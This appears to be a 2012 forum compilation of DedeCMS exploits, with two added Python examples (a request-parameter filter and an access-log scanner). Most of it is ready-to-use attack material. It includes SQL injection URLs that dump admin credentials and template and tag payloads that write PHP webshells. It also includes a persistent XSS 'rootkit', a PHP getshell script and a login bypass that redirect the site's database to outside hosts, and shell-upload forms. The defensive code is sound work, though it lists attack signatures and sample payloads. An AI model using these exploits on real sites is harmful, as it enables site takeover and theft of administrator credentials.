DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14
DedeCMS 5.6 rss injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a "software" entry; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php, a one-line shell with the password xiao.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy the URL below and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 block URL-based XSS, so their XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; from then on, visiting any of the URLs below still triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value, and you are taken straight into the site backend.
The precondition for this vulnerability is that the backend path must already be known.
DedeCMS (织梦) tag remote file write vulnerability
Prerequisite: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
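The three preceding items (the variable-override getshell script, the admin login bypass URL and the mytag_js.php form) all rely on the same weakness: request parameters named like _COOKIE[GLOBALS][cfg_dbhost] or _POST[GLOBALS][cfg_dbhost] get registered as variables and overwrite the application's cfg_* database settings with values the client chose. The check below is an added example and is not DedeCMS code or anything from this post: it refuses any request key whose name segments start with cfg_ or with a PHP superglobal name, in the spirit of the request-key check later DedeCMS releases added (that it matches those releases exactly is an assumption). It is written in Python rather than PHP so it can be run stand-alone; the query strings inside it are constructed, and 203.0.113.99 is a placeholder host.

```python
from urllib.parse import parse_qsl

# Names a request parameter must never be allowed to take once it is
# registered into the global scope: the application's own cfg_* settings and
# PHP's superglobals. Assumption: this mirrors the spirit of the request-key
# check later DedeCMS releases added; the exact list there is not taken from
# this post.
BLOCKED_PREFIXES = ("cfg_", "GLOBALS", "_GET", "_POST", "_COOKIE",
                    "_SESSION", "_SERVER", "_ENV", "_REQUEST", "_FILES")


def key_segments(key):
    """Split a PHP-style array key into its names.

    '_COOKIE[GLOBALS][cfg_dbhost]' -> ['_COOKIE', 'GLOBALS', 'cfg_dbhost']
    'tags[]'                       -> ['tags']
    """
    head, sep, rest = key.partition("[")
    names = [head]
    if sep:
        names += [part.rstrip("]") for part in rest.split("[")]
    return [n for n in names if n]


def is_blocked(key):
    """True if any segment of the key names a cfg_* setting or a superglobal.
    Every segment is checked, not only the first, so both 'cfg_basedir' and
    '_COOKIE[GLOBALS][cfg_dbhost]' are caught."""
    prefixes = tuple(p.lower() for p in BLOCKED_PREFIXES)
    return any(seg.lower().startswith(prefixes) for seg in key_segments(key))


def filter_request(query_string):
    """Split a query string or form body into (allowed, rejected).

    allowed  -> dict of parameters the application may go on to register
    rejected -> list of raw keys; a non-empty list means refuse the request
    """
    allowed, rejected = {}, []
    for key, value in parse_qsl(query_string, keep_blank_values=True):
        if is_blocked(key):
            rejected.append(key)
        else:
            allowed[key] = value
    return allowed, rejected


if __name__ == "__main__":
    # Constructed bodies in the shape of the requests in this post; 203.0.113.99
    # is a placeholder host, not one taken from the post.
    for sample in (
        "doaction=x&_COOKIE[GLOBALS][cfg_dbhost]=203.0.113.99&_COOKIE[GLOBALS][cfg_dbprefix]=dede_&nocache=true",
        "dopost=login&validate=dcug&userid=admin&_POST[GLOBALS][cfg_dbhost]=203.0.113.99",
        "activepath=/data/cache/&cfg_basedir=../../&cfg_imgtype=php&job=upload&newname=fly.php",
        "dopost=save&aid=2&tags[]=a&title=hello",
    ):
        allowed, rejected = filter_request(sample)
        print("REJECT" if rejected else "accept", "rejected:", rejected, "allowed:", sorted(allowed))
```

The check runs on parameter names only, before anything is registered, so it is independent of register_globals and of whether the values arrive in the query string, the body or cookies; the fourth sample shows an ordinary article edit passing untouched.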
DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, go into the member backend, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>
Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the article just edited has aid 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">更改</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
DedeCMS (织梦) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character value; from that, remove 3 characters at the front and 1 at the end to get the 16-character MD5.

DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS (织梦) 5.3-5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 means the trojan file was uploaded successfully.
DedeCMS (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
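Every item in this post is a request against one of a handful of DedeCMS scripts with a recognisable payload shape in the query string. The scanner below is an added example and not part of the post: it parses combined-format web-server access-log lines, percent-decodes the query string once, and reports which of the listed patterns a request matches, so a defender can find these probes in historical logs. The log lines inside it are constructed for the example (203.0.113.5 and 198.51.100.7 are documentation addresses), and the signature list is assembled from this post's own URLs, not from any vendor rule set. The mytag_js.php and select_soft_post.php items carry their payload in the POST body, which an access log does not record; for those, the GLOBALS rule only catches the query-string variant shown for login.php.

```python
import re
from urllib.parse import unquote

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) \S+')

# (label, path suffixes the rule applies to, regex over the decoded query string).
# The signatures follow the URLs collected in this post; "*" means any script.
RULES = [
    ("GLOBALS/cfg_ variable override", ("*",),
     re.compile(r"(_POST|_COOKIE|_GET|_REQUEST)\[GLOBALS\]|(^|&)(GLOBALS|cfg_\w+)(\[|=)", re.I)),
    ("rss.php error-based SQL injection", ("/plus/rss.php",),
     re.compile(r"updatexml\s*\(|extractvalue\s*\(", re.I)),
    ("advancedsearch.php attacker-supplied SQL", ("/plus/advancedsearch.php",),
     re.compile(r"(^|&)sql=", re.I)),
    ("gotopage reflected XSS", ("/login.php",),
     re.compile(r"gotopage=[^&]*<", re.I)),
    ("UNION-based SQL injection", ("/plus/feedback_js.php", "/plus/infosearch.php"),
     re.compile(r"union\s+select", re.I)),
    ("digg_frame.php comment-close into mysql_error_trace.php", ("/plus/digg_frame.php",),
     re.compile(r"mid=\*/")),
    ("edit_face.php traversal in file delete", ("/member/edit_face.php",),
     re.compile(r"oldface=[^&]*\.\./")),
    ("carbuyaction.php local file inclusion", ("/plus/carbuyaction.php",),
     re.compile(r"code=[^&]*\.\./")),
    ("member/index.php quote in uid (GBK injection probe)", ("/member/index.php",),
     re.compile(r"uid=[^&]*'")),
]


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse.
    The query string is percent-decoded once; double-encoded payloads would
    need a second pass, which is deliberately left out here."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, when, method, target, status = m.groups()
    path, _, query = target.partition("?")
    return {"ip": ip, "time": when, "method": method, "path": path,
            "query": unquote(query), "status": int(status)}


def match_rules(rec):
    """Labels of every rule whose script suffix and query pattern both match."""
    hits = []
    for label, suffixes, rx in RULES:
        if "*" not in suffixes and not any(rec["path"].endswith(s) for s in suffixes):
            continue
        if rx.search(rec["query"]):
            hits.append(label)
    return hits


def scan(log_text):
    """(ip, path, label) for each rule hit, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for label in match_rules(rec):
            findings.append((rec["ip"], rec["path"], label))
    return findings


# Constructed sample lines in the shape of the requests listed in this post;
# the last two are benign traffic that must not trigger anything.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,1,1)%23'][0]=1 HTTP/1.1" 200 512
203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 1024
203.0.113.5 - - [18/Oct/2012:10:42:31 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048
203.0.113.5 - - [18/Oct/2012:10:42:45 +0800] "GET /dede/login.php?dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.99 HTTP/1.1" 302 0
203.0.113.5 - - [18/Oct/2012:10:43:02 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88
203.0.113.5 - - [18/Oct/2012:10:43:10 +0800] "GET /plus/digg_frame.php?aid=1024e1024&mid=*/?%3E HTTP/1.1" 500 300
198.51.100.7 - - [18/Oct/2012:10:44:00 +0800] "GET /plus/rss.php?tid=1 HTTP/1.1" 200 4096
198.51.100.7 - - [18/Oct/2012:10:44:05 +0800] "GET /dede/login.php?gotopage=/dede/index.php HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for ip, path, label in scan(SAMPLE_LOG):
        print(f"{ip} {path}: {label}")
```

Each rule is scoped to the script it belongs to so that, for instance, a literal "sql=" parameter on some unrelated page does not fire the advancedsearch.php rule; the GLOBALS rule is the one exception, because a GLOBALS or cfg_ key has no legitimate use on any DedeCMS page.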